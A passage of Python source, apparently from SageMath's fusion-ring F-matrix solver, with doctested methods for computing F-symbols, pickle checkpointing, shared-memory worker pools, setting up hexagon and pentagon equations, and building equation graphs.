::\n\n sage: f = FusionRing(\"A2\", 1).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False)\n sage: phi = f.get_coerce_map_from_fr_cyclotomic_field()\n sage: f.field()\n Cyclotomic Field of order 48 and degree 16\n sage: f.field() == f.FR().field()\n True\n sage: phi.domain() == f.field()\n True\n sage: phi.is_identity()\n True\n \"\"\"\n # If base field is different from associated FusionRing's CyclotomicField,\n # return coercion map\n try:\n return self._coerce_map_from_cyc_field\n # Otherwise, return identity map CyclotomicField <-> CyclotomicField\n except AttributeError:\n F = self._FR.field()\n return F.hom([F.gen()], F)\n\n def get_fvars_in_alg_field(self):\n r\"\"\"\n Return F-symbols as elements of the :class:`QQbar`.\n\n This method uses the embedding defined by\n :meth:`get_qqbar_embedding` to coerce\n F-symbols into :class:`QQbar`.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"G2\", 1)\n sage: f = fr.get_fmatrix(fusion_label=\"g\", inject_variables=True, new=True)\n creating variables fx1..fx5\n Defining fx0, fx1, fx2, fx3, fx4\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field()\n Number Field in a with defining polynomial y^32 - ... - 22*y^2 + 1\n sage: f.get_fvars_in_alg_field()\n {(g1, g1, g1, g0, g1, g1): 1,\n (g1, g1, g1, g1, g0, g0): 0.61803399? + 0.?e-8*I,\n (g1, g1, g1, g1, g0, g1): -0.7861514? + 0.?e-8*I,\n (g1, g1, g1, g1, g1, g0): -0.7861514? + 0.?e-8*I,\n (g1, g1, g1, g1, g1, g1): -0.61803399? 
+ 0.?e-8*I}\n \"\"\"\n return {sextuple: self._qqbar_embedding(fvar) for sextuple, fvar in self._fvars.items()}\n\n def get_radical_expression(self):\n \"\"\"\n Return a radical expression of F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.FR().fusion_labels(\"g\", inject_variables=True)\n sage: f.find_orthogonal_solution(verbose=False)\n sage: radical_fvars = f.get_radical_expression() # long time (~1.5s)\n sage: radical_fvars[g1, g1, g1, g1, g1, g0] # long time\n -sqrt(1/2*sqrt(5) - 1/2)\n \"\"\"\n return {sextuple: val.radical_expression() for sextuple, val in self.get_fvars_in_alg_field().items()}\n\n #######################\n ### Private helpers ###\n #######################\n\n def _get_known_vals(self):\n r\"\"\"\n Construct a dictionary of ``idx``, ``known_val`` pairs used for\n substituting into remaining equations.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D4\", 1).get_fmatrix()\n sage: f._reset_solver_state()\n sage: len(f._get_known_vals()) == 0\n True\n sage: f.find_orthogonal_solution(verbose=False)\n sage: len(f._get_known_vals()) == f._poly_ring.ngens()\n True\n \"\"\"\n return {i: self._fvars[s] for i, s in self._idx_to_sextuple.items() if self._solved[i]}\n\n def _get_known_nonz(self):\n r\"\"\"\n Construct an :class:`ETuple` indicating positions of\n known nonzero variables.\n\n .. NOTE::\n\n MUST be called after ``self._ks = _get_known_sq()``.\n This method is called by the constructor of ``self``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D5\", 1).get_fmatrix() # indirect doctest\n sage: f._reset_solver_state()\n sage: f._nnz\n (100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100,\n 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, 100)\n \"\"\"\n nonz = {idx: 100 for idx in self._singles}\n for idx, v in self._ks.items():\n nonz[idx] = 100\n return ETuple(nonz, self._poly_ring.ngens())\n\n ##############################\n ### Variables partitioning ###\n ##############################\n\n def largest_fmat_size(self):\n r\"\"\"\n Get the size of the largest F-matrix `F^{abc}_d`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B3\", 2).get_fmatrix()\n sage: f.largest_fmat_size()\n 4\n \"\"\"\n return max(self.fmatrix(*tup).nrows() for tup in product(self._FR.basis(), repeat=4))\n\n def get_fvars_by_size(self, n, indices=False):\n r\"\"\"\n Return the set of F-symbols that are entries of an `n \\times n` matrix\n `F^{a, b, c}_d`.\n\n INPUT:\n\n - `n` -- a positive integer\n - ``indices`` -- boolean (default: ``False``)\n\n If ``indices`` is ``False`` (default),\n this method returns a set of sextuples `(a, b, c, d, x, y)` identifying\n the corresponding F-symbol. Each sextuple is a key in the\n dictionary returned by :meth:`get_fvars`.\n\n Otherwise the method returns a list of integer indices that\n internally identify the F-symbols. 
The ``indices=True`` option is\n        meant for internal use.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"A2\", 2).get_fmatrix(inject_variables=True)\n            creating variables fx1..fx287\n            Defining fx0, ..., fx286\n            sage: f.largest_fmat_size()\n            2\n            sage: f.get_fvars_by_size(2)\n            {(f2, f2, f2, f4, f1, f1),\n             (f2, f2, f2, f4, f1, f5),\n             ...\n             (f4, f4, f4, f4, f4, f0),\n             (f4, f4, f4, f4, f4, f4)}\n        \"\"\"\n        var_set = set()\n        one = self._FR.one()\n        for a, b, c, d in product(self._FR.basis(), repeat=4):\n            X = self.f_from(a, b, c, d)\n            Y = self.f_to(a, b, c, d)\n            if len(X) == n and len(Y) == n:\n                for x in X:\n                    for y in Y:\n                        # Discard trivial 1x1 F-matrix\n                        trivial = a == one and x == b and y == d\n                        trivial |= b == one and x == a and y == c\n                        trivial |= c == one and x == d and y == b\n                        if not trivial:\n                            var_set.add((a, b, c, d, x, y))\n        if indices:\n            sext_to_idx = {v: k for k, v in self._idx_to_sextuple.items()}\n            return {sext_to_idx[fx] for fx in var_set}\n        return var_set\n\n    ############################\n    ### Checkpoint utilities ###\n    ############################\n\n    def save_fvars(self, filename):\n        r\"\"\"\n        Save computed F-symbols for later use.\n\n        INPUT:\n\n        - ``filename`` -- a string specifying the name of the pickle file\n          to be used\n\n        The current directory is used unless an absolute path to a file in\n        a different directory is provided.\n\n        .. NOTE::\n\n            This method should only be used *after* successfully running one\n            of the solvers, e.g. :meth:`find_cyclotomic_solution` or\n            :meth:`find_orthogonal_solution`.\n\n            When used in conjunction with :meth:`load_fvars`, this method may\n            be used to restore the state of an :class:`FMatrix` object at the\n            end of a successful F-matrix solver run.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n            sage: f.find_orthogonal_solution(verbose=False)\n            sage: fvars = f.get_fvars()\n            sage: K = f.field()\n            sage: filename = f.get_fr_str() + \"_solver_results.pickle\"\n            sage: f.save_fvars(filename)\n            sage: del f\n            sage: f2 = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n            sage: f2.load_fvars(filename)\n            sage: fvars == f2.get_fvars()\n            True\n            sage: K == f2.field()\n            True\n            sage: os.remove(filename)\n        \"\"\"\n        final_state = [\n            self._fvars,\n            self._non_cyc_roots,\n            self.get_coerce_map_from_fr_cyclotomic_field(),\n            self._qqbar_embedding,\n        ]\n        with open(filename, 'wb') as f:\n            pickle.dump(final_state, f)\n\n    def load_fvars(self, filename):\n        r\"\"\"\n        Load previously computed F-symbols from a pickle file.\n\n        See :meth:`save_fvars` for more information.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n            sage: f.find_orthogonal_solution(verbose=False)\n            sage: fvars = f.get_fvars()\n            sage: K = f.field()\n            sage: filename = f.get_fr_str() + \"_solver_results.pickle\"\n            sage: f.save_fvars(filename)\n            sage: del f\n            sage: f2 = FusionRing(\"A2\", 1).get_fmatrix(new=True)\n            sage: f2.load_fvars(filename)\n            sage: fvars == f2.get_fvars()\n            True\n            sage: K == f2.field()\n            True\n            sage: os.remove(filename)\n\n        .. NOTE::\n\n            This method does not work with intermediate\n            checkpoint pickles; it only works with pickles containing *all*\n            F-symbols, i.e. 
those created by :meth:`save_fvars` and by\n specifying an optional ``save_results`` parameter for\n :meth:`find_orthogonal_solution`.\n \"\"\"\n with open(filename, 'rb') as f:\n self._fvars, self._non_cyc_roots, self._coerce_map_from_cyc_field, self._qqbar_embedding = pickle.load(f)\n # Update state attributes\n self._chkpt_status = 7\n self._solved = list(True for v in self._fvars)\n self._field = self._qqbar_embedding.domain()\n\n def get_fr_str(self):\n r\"\"\"\n Auto-generate an identifying key for saving results.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B3\", 1).get_fmatrix()\n sage: f.get_fr_str()\n 'B31'\n \"\"\"\n ct = self._FR.cartan_type()\n return ct.letter + str(ct.n) + str(self._FR.fusion_level())\n\n def _checkpoint(self, do_chkpt, status, verbose=True):\n r\"\"\"\n Pickle current solver state.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim(verbose=False)\n sage: f._update_reduction_params()\n sage: f._checkpoint(do_chkpt=True, status=2)\n Checkpoint 2 reached!\n sage: del f\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(warm_start=\"fmatrix_solver_checkpoint_A13.pickle\")\n Computing F-symbols for The Fusion Ring of Type A1 and level 3 with Integer Ring coefficients with 71 variables...\n Set up 121 reduced pentagons...\n Elimination epoch completed... 18 eqns remain in ideal basis\n Elimination epoch completed... 5 eqns remain in ideal basis\n Pent elim step solved for 64 / 71 variables\n Partitioned 5 equations into 1 components of size:\n [4]\n Elimination epoch completed... 
0 eqns remain in ideal basis\n Partitioned 6 equations into 6 components of size:\n [1, 1, 1, 1, 1, 1]\n Computing appropriate NumberField...\n sage: f._chkpt_status == 7\n True\n sage: sum(f._solved) == f._poly_ring.ngens()\n True\n sage: os.remove(\"fmatrix_solver_checkpoint_A13.pickle\")\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim(verbose=False)\n sage: f._update_reduction_params()\n sage: f.get_defining_equations('pentagons', output=False)\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: f._triangular_elim(verbose=False)\n sage: f._checkpoint(do_chkpt=True, status=4)\n Checkpoint 4 reached!\n sage: del f\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(warm_start=\"fmatrix_solver_checkpoint_A12.pickle\")\n Computing F-symbols for The Fusion Ring of Type A1 and level 2 with Integer Ring coefficients with 14 variables...\n Partitioned 0 equations into 0 components of size:\n []\n Partitioned 2 equations into 2 components of size:\n [1, 1]\n sage: f._chkpt_status == 7\n True\n sage: sum(f._solved) == f._poly_ring.ngens()\n True\n sage: os.remove(\"fmatrix_solver_checkpoint_A12.pickle\")\n \"\"\"\n if not do_chkpt:\n return\n filename = \"fmatrix_solver_checkpoint_\" + self.get_fr_str() + \".pickle\"\n with open(filename, 'wb') as f:\n pickle.dump([self._fvars, list(self._solved), self._ks, self.ideal_basis, status], f)\n if verbose:\n print(f\"Checkpoint {status} reached!\")\n\n def _restore_state(self, filename):\n r\"\"\"\n Load solver state from file. 
Use this method both for warm-starting\n :meth:`find_orthogonal_solution` and to load pickled results.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim(verbose=False)\n sage: f._update_reduction_params()\n sage: fvars = f._fvars\n sage: ib = f.ideal_basis\n sage: solved = f._solved\n sage: ks = f._ks\n sage: status = f._chkpt_status\n sage: f._checkpoint(do_chkpt=True, status=2)\n Checkpoint 2 reached!\n sage: del f\n sage: f = FusionRing(\"A1\", 2).get_fmatrix(new=True)\n sage: f._reset_solver_state()\n sage: f._restore_state(\"fmatrix_solver_checkpoint_A12.pickle\")\n sage: for sextuple, fvar in fvars.items():\n ....: assert fvar == f._fvars[sextuple]\n ....:\n sage: ib == f.ideal_basis\n True\n sage: ks == f._ks\n True\n sage: solved == f._solved\n True\n sage: 2 == f._chkpt_status\n True\n sage: os.remove(\"fmatrix_solver_checkpoint_A12.pickle\")\n\n TESTS::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(save_results=\"test.pickle\", verbose=False) # long time\n sage: del f\n sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n sage: f.find_orthogonal_solution(warm_start=\"test.pickle\") # long time\n sage: f._chkpt_status == 7 # long time\n True\n sage: os.remove(\"test.pickle\") # long time\n \"\"\"\n with open(filename, 'rb') as f:\n state = pickle.load(f)\n # Loading saved results pickle\n if len(state) == 4:\n self.load_fvars(filename)\n self._chkpt_status = 7\n return\n self._fvars, self._solved, self._ks, self.ideal_basis, self._chkpt_status = state\n self._update_reduction_params()\n\n #################\n ### MapReduce ###\n #################\n\n def start_worker_pool(self, processes=None):\n \"\"\"\n Initialize a ``multiprocessing`` worker pool for parallel processing,\n which may be used e.g. to set up defining equations using\n :meth:`get_defining_equations`.\n\n This method sets ``self``'s ``pool`` attribute. The worker\n pool may be used time and again. Upon initialization, each process\n in the pool attaches to the necessary shared memory resources.\n\n When you are done using the worker pool, use\n :meth:`shutdown_worker_pool` to close the pool and properly dispose\n of shared memory resources.\n\n .. 
NOTE::\n\n            Python 3.8+ is required, since the ``multiprocessing.shared_memory``\n            module must be imported.\n\n        INPUT:\n\n        - ``processes`` -- an integer indicating the number of workers\n          in the pool; if left unspecified, the number of workers\n          equals the number of processors available\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"G2\", 1).get_fmatrix(new=True)\n            sage: f.start_worker_pool()\n            sage: he = f.get_defining_equations('hexagons')\n            sage: sorted(he)\n            [fx0 - 1,\n             fx2*fx3 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx4^2 + (zeta60^6)*fx4,\n             fx1*fx3 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx3*fx4 + (zeta60^14 - zeta60^4)*fx3,\n             fx1*fx2 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx2*fx4 + (zeta60^14 - zeta60^4)*fx2,\n             fx1^2 + (zeta60^14 + zeta60^12 - zeta60^6 - zeta60^4 + 1)*fx2*fx3 + (-zeta60^12)*fx1]\n            sage: pe = f.get_defining_equations('pentagons')\n            sage: f.shutdown_worker_pool()\n\n        .. WARNING::\n\n            This method is needed to initialize the worker pool using the\n            necessary shared memory resources. Simply using the\n            ``multiprocessing.Pool`` constructor will not work with our\n            class methods.\n\n        .. WARNING::\n\n            Failure to call :meth:`shutdown_worker_pool` may result in a memory\n            leak, since shared memory resources outlive the process that created\n            them.\n        \"\"\"\n        try:\n            set_start_method('fork')\n        except RuntimeError:\n            pass\n        if not hasattr(self, '_nnz'):\n            self._reset_solver_state()\n        # Set up shared memory resource handlers\n        n_proc = cpu_count() if processes is None else processes\n        self._pid_list = shared_memory.ShareableList([0]*(n_proc+1))\n        pids_name = self._pid_list.shm.name\n        self._solved = shared_memory.ShareableList(self._solved)\n        s_name = self._solved.shm.name\n        self._var_degs = shared_memory.ShareableList(self._var_degs)\n        vd_name = self._var_degs.shm.name\n        n = self._poly_ring.ngens()\n        self._ks = KSHandler(n, self._field, use_mp=True, init_data=self._ks)\n        ks_names = self._ks.shm.name\n        self._shared_fvars = FvarsHandler(n, self._field, self._idx_to_sextuple, use_mp=n_proc, pids_name=pids_name, init_data=self._fvars)\n        fvar_names = self._shared_fvars.shm.name\n        # Initialize worker pool processes\n        args = (id(self), s_name, vd_name, ks_names, fvar_names, n_proc, pids_name)\n\n        def init(fmats_id, solved_name, vd_name, ks_names, fvar_names, n_proc, pids_name):\n            \"\"\"\n            Connect worker process to shared memory resources\n            \"\"\"\n            fmats_obj = cast(fmats_id, py_object).value\n            fmats_obj._solved = shared_memory.ShareableList(name=solved_name)\n            fmats_obj._var_degs = shared_memory.ShareableList(name=vd_name)\n            n = fmats_obj._poly_ring.ngens()\n            K = fmats_obj._field\n            fmats_obj._fvars = FvarsHandler(n, K, fmats_obj._idx_to_sextuple, name=fvar_names, use_mp=n_proc, pids_name=pids_name)\n            fmats_obj._ks = KSHandler(n, K, name=ks_names, use_mp=True)\n\n        self.pool = Pool(processes=n_proc, initializer=init, initargs=args)\n        self._pid_list[0] = getpid()\n        for i, p in enumerate(self.pool._pool):\n            self._pid_list[i+1] = p.pid\n
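\n    # Added usage sketch (comments only): the pool is created once, reused\n    # across calls that accept it, and then explicitly shut down so that the\n    # shared memory segments allocated above are unlinked, e.g.\n    #\n    #     f = FusionRing(\"A1\", 3).get_fmatrix()\n    #     f.start_worker_pool()\n    #     f.get_defining_equations('hexagons', output=False)\n    #     f.shutdown_worker_pool()\n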
\n    def shutdown_worker_pool(self):\n        r\"\"\"\n        Shut down the worker pool and dispose of shared memory resources\n        created when the pool was set up using :meth:`start_worker_pool`.\n\n        .. WARNING::\n\n            Failure to call this method after using :meth:`start_worker_pool`\n            to create a process pool may result in a memory\n            leak, since shared memory resources outlive the process that\n            created them.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"A1\", 3).get_fmatrix(new=True)\n            sage: f.start_worker_pool()\n            sage: he = f.get_defining_equations('hexagons')\n            sage: f.shutdown_worker_pool()\n        \"\"\"\n        if self.pool is not None:\n            self.pool.close()\n            self.pool = None\n            self._solved.shm.unlink()\n            self._var_degs.shm.unlink()\n            self._ks.shm.unlink()\n            self._shared_fvars.shm.unlink()\n            self._pid_list.shm.unlink()\n            del self.__dict__['_shared_fvars']\n\n    def _map_triv_reduce(self, mapper, input_iter, worker_pool=None, chunksize=None, mp_thresh=None):\n        r\"\"\"\n        Apply the given mapper to each element of the given input iterable and\n        return the results (with no duplicates) in a list.\n\n        INPUT:\n\n        - ``mapper`` -- string specifying the name of a function defined in\n          the ``fast_parallel_fmats_methods`` module\n        - ``input_iter`` -- an iterable of arguments to be passed to ``mapper``\n        - ``worker_pool`` -- (optional) a worker pool created by\n          :meth:`start_worker_pool`\n        - ``chunksize`` -- (optional) the chunk size used when dispatching\n          work to the pool\n        - ``mp_thresh`` -- (optional) the minimum number of inputs for which\n          multiprocessing is used; defaults to ``self.mp_thresh``\n\n        .. NOTE::\n\n            If ``worker_pool`` is not provided, the function maps and reduces on a\n            single process.\n            If ``worker_pool`` is provided, the function attempts to determine\n            whether it should use multiprocessing based on the length of the\n            input iterable. If it can't determine the length of the input\n            iterable then it uses multiprocessing with the default chunksize of\n            `1` unless a chunksize is provided.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"A1\", 2).get_fmatrix()\n            sage: f._reset_solver_state()\n            sage: len(f._map_triv_reduce('get_reduced_hexagons', [(0, 1, False)]))\n            11\n            sage: f.start_worker_pool()\n            sage: mp_params = [(i, f.pool._processes, True) for i in range(f.pool._processes)]\n            sage: len(f._map_triv_reduce('get_reduced_pentagons', mp_params, worker_pool=f.pool, chunksize=1, mp_thresh=0))\n            33\n            sage: f.shutdown_worker_pool()\n        \"\"\"\n        if mp_thresh is None:\n            mp_thresh = self.mp_thresh\n        # Compute multiprocessing parameters\n        if worker_pool is not None:\n            try:\n                n = len(input_iter)\n            except (TypeError, ValueError, AttributeError):\n                n = mp_thresh + 1\n            if chunksize is None:\n                chunksize = n // (worker_pool._processes**2) + 1\n        no_mp = worker_pool is None or n < mp_thresh\n        # Map phase\n        input_iter = zip_longest([], input_iter, fillvalue=(mapper, id(self)))\n        if no_mp:\n            mapped = map(executor, input_iter)\n        else:\n            mapped = worker_pool.imap_unordered(executor, input_iter, chunksize=chunksize)\n        # Reduce phase\n        results = set()\n        for child_eqns in mapped:\n            if child_eqns is not None:\n                results.update(child_eqns)\n        results = list(results)\n        return results\n\n    ########################\n    ### Equations set up ###\n    ########################\n\n    def get_orthogonality_constraints(self, output=True):\n        r\"\"\"\n        Get equations imposed on the F-matrix by orthogonality.\n\n        INPUT:\n\n        - ``output`` -- a boolean\n\n        OUTPUT:\n\n        If ``output=True``, orthogonality constraints are returned as\n        polynomial objects.\n\n        Otherwise, the constraints are appended to ``self.ideal_basis``.\n        They are stored in the internal tuple representation. 
The\n ``output=False`` option is meant mostly for internal use by the\n F-matrix solver.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B4\", 1).get_fmatrix()\n sage: f.get_orthogonality_constraints()\n [fx0^2 - 1,\n fx1^2 - 1,\n fx2^2 - 1,\n fx3^2 - 1,\n fx4^2 - 1,\n fx5^2 - 1,\n fx6^2 - 1,\n fx7^2 - 1,\n fx8^2 - 1,\n fx9^2 - 1,\n fx10^2 + fx12^2 - 1,\n fx10*fx11 + fx12*fx13,\n fx10*fx11 + fx12*fx13,\n fx11^2 + fx13^2 - 1]\n \"\"\"\n eqns = []\n for tup in product(self._FR.basis(), repeat=4):\n mat = self.fmatrix(*tup)\n eqns.extend((mat.T * mat - matrix.identity(mat.nrows())).coefficients())\n if output:\n return eqns\n self.ideal_basis.extend([poly_to_tup(eq) for eq in eqns])\n\n def get_defining_equations(self, option, output=True):\n r\"\"\"\n Get the equations defining the ideal generated by the hexagon or\n pentagon relations.\n\n INPUT:\n\n - ``option`` -- a string determining equations to be set up:\n\n * ``'hexagons'`` - get equations imposed on the F-matrix by\n the hexagon relations in the definition of a braided category\n\n * ``'pentagons'`` - get equations imposed on the F-matrix by\n the pentagon relations in the definition of a monoidal category\n\n - ``output`` -- (default: ``True``) a boolean indicating whether\n results should be returned, where the equations will be polynomials.\n Otherwise, the constraints are appended to ``self.ideal_basis``.\n Constraints are stored in the internal tuple representation. The\n ``output=False`` option is meant only for internal use by the\n F-matrix solver. When computing the hexagon equations with the\n ``output=False`` option, the initial state of the F-symbols is used.\n\n .. NOTE::\n\n To set up the defining equations using parallel processing,\n use :meth:`start_worker_pool` to initialize multiple processes\n *before* calling this method.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B2\", 1).get_fmatrix()\n sage: sorted(f.get_defining_equations('hexagons'))\n [fx7 + 1,\n fx6 - 1,\n fx2 + 1,\n fx0 - 1,\n fx11*fx12 + (-zeta32^8)*fx13^2 + (zeta32^12)*fx13,\n fx10*fx12 + (-zeta32^8)*fx12*fx13 + (zeta32^4)*fx12,\n fx10*fx11 + (-zeta32^8)*fx11*fx13 + (zeta32^4)*fx11,\n fx10^2 + (-zeta32^8)*fx11*fx12 + (-zeta32^12)*fx10,\n fx4*fx9 + fx7,\n fx3*fx8 - fx6,\n fx1*fx5 + fx2]\n sage: pe = f.get_defining_equations('pentagons')\n sage: len(pe)\n 33\n \"\"\"\n if not hasattr(self, '_nnz'):\n self._reset_solver_state()\n n_proc = self.pool._processes if self.pool is not None else 1\n params = [(child_id, n_proc, output) for child_id in range(n_proc)]\n eqns = self._map_triv_reduce('get_reduced_'+option, params, worker_pool=self.pool, chunksize=1, mp_thresh=0)\n if output:\n F = self._field\n for i, eq_tup in enumerate(eqns):\n eqns[i] = _unflatten_coeffs(F, eq_tup)\n return [self._tup_to_fpoly(p) for p in eqns]\n self.ideal_basis.extend(eqns)\n\n ############################\n ### Equations processing ###\n ############################\n\n def _tup_to_fpoly(self, eq_tup):\n r\"\"\"\n Assemble a polynomial object from its tuple representation.\n\n .. 
WARNING::\n\n This method avoids implicit casting when constructing a\n polynomial object, and may therefore lead to SEGFAULTs.\n It is meant for internal use by the F-matrix solver.\n\n This method is a left inverse of\n :meth:`sage.algebras.fusion_rings.poly_tup_engine.poly_to_tup`.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C3\", 1).get_fmatrix()\n sage: f.start_worker_pool()\n sage: he = f.get_defining_equations('hexagons')\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_to_tup\n sage: all(f._tup_to_fpoly(poly_to_tup(h)) for h in he)\n True\n sage: f.shutdown_worker_pool()\n \"\"\"\n return _tup_to_poly(eq_tup, parent=self._poly_ring)\n\n def _update_reduction_params(self, eqns=None):\n r\"\"\"\n Update reduction parameters that are solver state attributes.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"A1\", 3).get_fmatrix()\n sage: f._reset_solver_state()\n sage: f.get_orthogonality_constraints(output=False)\n sage: f.start_worker_pool()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.ideal_basis = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis.sort(key=poly_tup_sortkey)\n sage: f.mp_thresh = 0\n sage: f._fvars = f._shared_fvars\n sage: f._triangular_elim(verbose=False) # indirect doctest\n sage: f.ideal_basis\n []\n sage: f.shutdown_worker_pool()\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n self._ks.update(eqns)\n for i, d in enumerate(get_variables_degrees(eqns, self._poly_ring.ngens())):\n self._var_degs[i] = d\n self._nnz = self._get_known_nonz()\n self._kp = compute_known_powers(self._var_degs, self._get_known_vals(), self._field.one())\n\n def _triangular_elim(self, eqns=None, verbose=True):\n r\"\"\"\n Perform triangular elimination of linear terms in two-term equations\n until no such terms exist.\n\n .. NOTE::\n\n For optimal usage of triangular elimination, pass in a\n *sorted* list of equations.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D3\", 1).get_fmatrix()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: f.get_orthogonality_constraints(output=False)\n sage: gb = f._par_graph_gb(verbose=False)\n sage: from sage.algebras.fusion_rings.poly_tup_engine import poly_tup_sortkey, poly_to_tup\n sage: f.ideal_basis = sorted(gb, key=poly_tup_sortkey)\n sage: from sage.algebras.fusion_rings.shm_managers import FvarsHandler\n sage: n = f._poly_ring.ngens()\n sage: f._fvars = FvarsHandler(n, f._field, f._idx_to_sextuple, init_data=f._fvars)\n sage: f._triangular_elim()\n Elimination epoch completed... 0 eqns remain in ideal basis\n sage: f.ideal_basis\n []\n \"\"\"\n if eqns is None:\n eqns = self.ideal_basis\n\n while True:\n linear_terms_exist = _solve_for_linear_terms(self, eqns)\n if not linear_terms_exist:\n break\n _backward_subs(self)\n # Compute new reduction params and update eqns\n self._update_reduction_params(eqns=eqns)\n if self.pool is not None and len(eqns) > self.mp_thresh:\n n = self.pool._processes\n chunks = [[] for i in range(n)]\n for i, eq_tup in enumerate(eqns):\n chunks[i%n].append(eq_tup)\n eqns = chunks\n else:\n eqns = [eqns]\n eqns = self._map_triv_reduce('update_reduce', eqns, worker_pool=self.pool, mp_thresh=0)\n eqns.sort(key=poly_tup_sortkey)\n if verbose:\n print(\"Elimination epoch completed... 
{} eqns remain in ideal basis\".format(len(eqns)))\n        self.ideal_basis = eqns\n\n    #####################\n    ### Graph methods ###\n    #####################\n\n    def equations_graph(self, eqns=None):\n        r\"\"\"\n        Construct a graph corresponding to the given equations.\n\n        Every node corresponds to a variable and nodes are connected when\n        the corresponding variables appear together in an equation.\n\n        INPUT:\n\n        - ``eqns`` -- a list of polynomials\n\n        Each polynomial is either an object in the ring returned by\n        :meth:`get_poly_ring` or it is a tuple of pairs representing\n        a polynomial using the internal representation.\n\n        If no list of equations is passed, the graph is built from the\n        polynomials in ``self.ideal_basis``. In this case the method assumes\n        the internal representation of a polynomial as a tuple of pairs is\n        used.\n\n        This method is crucial to :meth:`find_orthogonal_solution`. The\n        hexagon equations, obtained using :meth:`get_defining_equations`,\n        define a disconnected graph that breaks up into many small components.\n        The :meth:`find_orthogonal_solution` solver exploits this when\n        undertaking a Groebner basis computation.\n\n        OUTPUT:\n\n        A ``Graph`` object. If a list of polynomial objects was given,\n        the set of nodes in the output graph is the subset of polynomial\n        ring generators appearing in the equations.\n\n        If the internal representation was used, the set of nodes is\n        the subset of indices corresponding to polynomial ring generators.\n        This option is meant for internal use by the F-matrix solver.\n\n        EXAMPLES::\n\n            sage: f = FusionRing(\"A3\", 1).get_fmatrix()\n            sage: f.get_poly_ring().ngens()\n            27\n            sage: he = f.get_defining_equations('hexagons')\n            sage: graph = f.equations_graph(he)\n            sage: graph.connected_components_sizes()\n            [6, 3, 3, 3, 3, 3, 3, 1, 1, 1]\n        \"\"\"\n        if eqns is None:\n            eqns = self.ideal_basis\n\n        G = Graph()\n        if not eqns:\n            return G\n\n        # Eqns could be a list of poly objects or poly tuples stored in internal repn\n        if isinstance(eqns[0], tuple):\n            G.add_vertices([x for eq_tup in eqns for x in variables(eq_tup)])\n        else:\n            G.add_vertices([x for eq in eqns for x in eq.variables()])\n        for eq in eqns:\n            # Eqns could be a list of poly objects or poly tuples stored in internal repn\n            if isinstance(eq, tuple):\n                s = [v for v in variables(eq)]\n            else:\n                s = [v for v in 